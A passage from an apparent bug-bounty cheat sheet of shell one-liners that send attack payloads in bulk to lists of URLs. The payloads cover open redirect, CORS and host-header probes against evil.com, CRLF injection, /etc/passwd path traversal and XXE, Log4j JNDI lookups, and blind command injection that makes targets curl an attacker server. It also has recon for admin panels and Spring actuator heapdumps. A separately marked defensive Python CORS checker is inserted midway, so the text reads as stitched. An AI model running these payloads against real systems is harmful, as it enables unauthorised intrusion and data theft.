echo "https://target.com" | nuclei -dast -t dast/vulnerabilities/xss/ -rl 5

Open Redirect Mass

cat urls.txt | gf redirect | qsreplace "https://evil.com" | httpx -silent -location | grep "evil.com"

CORS Misconfiguration

cat urls.txt | httpx -silent -H "Origin: https://evil.com" -match-string "evil.com" | anew cors_vuln.txt
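The httpx probe above treats any response that echoes `evil.com` as a hit, which misses the two details that decide severity: whether `Access-Control-Allow-Credentials: true` accompanies the reflected origin, and whether a correct allow-list still lacks `Vary: Origin` (a cache-poisoning path). As an added example that is not part of the repository, the Python below classifies one CORS exchange from the Origin sent and the response headers received, so the same logic can be applied to an application's own CORS configuration before a hunter does. The allow-list `TRUSTED_ORIGINS`, the `*.target.example` hosts and every response in `SAMPLE_EXCHANGES` are constructed for this example; no request is sent.

```python
# Assumed allow-list for the application under review (hypothetical hosts).
TRUSTED_ORIGINS = {"https://app.target.example", "https://target.example"}


def classify_cors(request_origin, response_headers, trusted_origins=TRUSTED_ORIGINS):
    """Verdict for one exchange: the Origin the probe sent and the headers that came back."""
    headers = {k.lower(): v.strip() for k, v in response_headers.items()}
    acao = headers.get("access-control-allow-origin")
    with_creds = headers.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return "no-cors"                    # browser blocks the cross-origin read; nothing to report
    if acao == "*":
        # Browsers refuse '*' together with credentials, but the config is still wrong.
        return "wildcard-with-credentials" if with_creds else "wildcard"
    if acao == "null":
        return "null-origin-allowed"        # sandboxed iframes and file:// pages send Origin: null
    if acao == request_origin and request_origin not in trusted_origins:
        # Reflection of an arbitrary origin; exact-match check also catches
        # suffix tricks such as https://target.example.evil.example.
        return ("reflects-untrusted-origin-with-credentials" if with_creds
                else "reflects-untrusted-origin")
    if acao in trusted_origins and "origin" not in headers.get("vary", "").lower():
        return "ok-missing-vary-origin"     # right allow-list, but a cache may serve it to the wrong origin
    return "ok"


def audit(exchanges, trusted_origins=TRUSTED_ORIGINS):
    """exchanges: (url, origin_sent, response_headers) tuples. Returns only what is worth reporting."""
    findings = []
    for url, origin, headers in exchanges:
        verdict = classify_cors(origin, headers, trusted_origins)
        if verdict not in ("no-cors", "ok"):
            findings.append((url, origin, verdict))
    return findings


# Constructed responses, as if captured by the httpx probe above (not real traffic).
SAMPLE_EXCHANGES = [
    ("https://api.target.example/me", "https://evil.example",
     {"Access-Control-Allow-Origin": "https://evil.example",
      "Access-Control-Allow-Credentials": "true"}),
    ("https://api.target.example/public", "https://evil.example",
     {"Access-Control-Allow-Origin": "*"}),
    ("https://api.target.example/me", "https://app.target.example",
     {"Access-Control-Allow-Origin": "https://app.target.example",
      "Access-Control-Allow-Credentials": "true", "Vary": "Origin"}),
    ("https://api.target.example/login", "https://evil.example",
     {"Content-Type": "application/json"}),
    ("https://api.target.example/me", "null",
     {"Access-Control-Allow-Origin": "null", "Access-Control-Allow-Credentials": "true"}),
    ("https://api.target.example/me", "https://target.example.evil.example",
     {"Access-Control-Allow-Origin": "https://target.example.evil.example",
      "Access-Control-Allow-Credentials": "true"}),
]

if __name__ == "__main__":
    for url, origin, verdict in audit(SAMPLE_EXCHANGES):
        print(f"{verdict:<46} {url} (Origin: {origin})")
```

Only `reflects-untrusted-origin-with-credentials` and `null-origin-allowed` with credentials let a third-party page read an authenticated response; `wildcard` on a public endpoint is usually intentional and is listed so the reviewer can confirm that, not as a vulnerability on its own.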

Host Header Injection

cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -match-string "evil.com"

CRLF Injection

cat urls.txt | qsreplace "%0d%0aX-Injected: header" | httpx -silent -match-string "X-Injected"

Prototype Pollution

cat js.txt | xargs -I@ curl -s @ | grep -E "(__proto__|constructor\.prototype)" | anew proto_pollution.txt

Cache Poisoning Detection

cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -H "X-Original-URL: /admin" -mc 200

IDOR Pattern Detection

cat urls.txt | grep -oE "(id|user|account|uid|pid)=[0-9]+" | sort -u | anew idor_candidates.txt

Race Condition URLs

cat urls.txt | grep -iE "(redeem|coupon|vote|like|follow|transfer|withdraw)" | anew race_condition.txt

WebSocket Endpoints

cat urls.txt | grep -iE "(socket|ws://|wss://)" | anew websocket.txt

Path Traversal

cat urls.txt | gf lfi | qsreplace "....//....//....//etc/passwd" | httpx -silent -match-string "root:x"

XXE Detection

cat urls.txt | grep -iE "\.(xml|soap)" | qsreplace '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'

Log4j Scan

cat urls.txt | qsreplace '${jndi:ldap://YOURSERVER/a}' | httpx -silent -H 'X-Api-Version: ${jndi:ldap://YOURSERVER/a}'

Blind Command Injection

cat urls.txt | qsreplace "\`curl YOURSERVER\`" | httpx -silent
cat urls.txt | qsreplace "| curl YOURSERVER" | httpx -silent

Mass Screenshot

cat alive.txt | xargs -I@ gowitness single @ -o screenshots/

Technology Detection

cat alive.txt | httpx -silent -tech-detect -status-code -title | anew tech_stack.txt

Favicon MD5 Hash

curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}'

Exposed Admin Panels

cat alive.txt | httpx -silent -path /admin,/administrator,/admin.php,/wp-admin,/manager,/phpmyadmin -mc 200,301,302 | anew admin_panels.txt

Debug Endpoints

cat alive.txt | httpx -silent -path /debug,/trace,/actuator,/metrics,/health,/info -mc 200 | anew debug_endpoints.txt

Spring Boot Actuators

cat alive.txt | httpx -silent -path /actuator/env,/actuator/heapdump,/actuator/mappings -mc 200 | anew spring_actuators.txt

WordPress Enumeration

cat alive.txt | httpx -silent -path /wp-json/wp/v2/users -mc 200 | anew wp_users.txt

Laravel Debug Mode

cat alive.txt | httpx -silent -match-string "Whoops" -match-string "Laravel" | anew laravel_debug.txt

Django Debug

cat alive.txt | httpx -silent -match-string "Django" -match-string "DEBUG" | anew django_debug.txt

HTTP Request Smuggling

cat alive.txt | python3 smuggler.py -q 2>/dev/null | anew smuggling.txt

CSP Bypass Check

cat alive.txt | httpx -silent -include-response-header | grep -i "content-security-policy" | anew csp_headers.txt

Favicon Hash (Shodan mmh3)

curl -s https://target.com/favicon.ico | python3 -c "import mmh3,sys,codecs;print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),'base64')))"

🔍 Search Engines for Hackers

| Engine | Link | Description |
|---|---|---|
| Shodan | shodan.io | IoT & device search |
| Censys | censys.io | Internet scan data |
| Fofa | fofa.info | Cyberspace search |
| ZoomEye | zoomeye.org | Cyberspace mapping |
| Hunter | hunter.how | Asset discovery |
| Netlas | netlas.io | Attack surface |
| GreyNoise | greynoise.io | Internet scanners |
| Onyphe | onyphe.io | Cyber defense |
| CriminalIP | criminalip.io | Threat intel |
| FullHunt | fullhunt.io | Attack surface |
| Quake | quake.360.net | Cyberspace search |
| Leakix | leakix.net | Leak detection |
| URLScan | urlscan.io | URL analysis |
| DNSDumpster | dnsdumpster.com | DNS recon |
| crt.sh | crt.sh | Certificate search |
| SecurityTrails | securitytrails.com | DNS history |
| Pulsedive | pulsedive.com | Threat intel |
| VirusTotal | virustotal.com | File/URL analysis |
| PublicWWW | publicwww.com | Source code search |
| Grep.app | grep.app | GitHub code search |

📖 Recommended Wordlists

| Wordlist | Link | Use Case |
|---|---|---|
| SecLists | GitHub | Everything |
| FuzzDB | GitHub | Fuzzing |
| Assetnote | wordlists.assetnote.io | Web content |
| OneListForAll | GitHub | Combined |
| jhaddix all.txt | GitHub | Directories |
| commonspeak2 | GitHub | Real-world |

📚 Learning Resources

Books

  • Web Application Hacker's Handbook
  • Real-World Bug Hunting by Peter Yaworski
  • Bug Bounty Bootcamp by Vickie Li

⚠️ Disclaimer

For authorized security testing only. Always obtain proper authorization before testing.

The author is not responsible for any misuse of this information.


Last Updated: December 2024
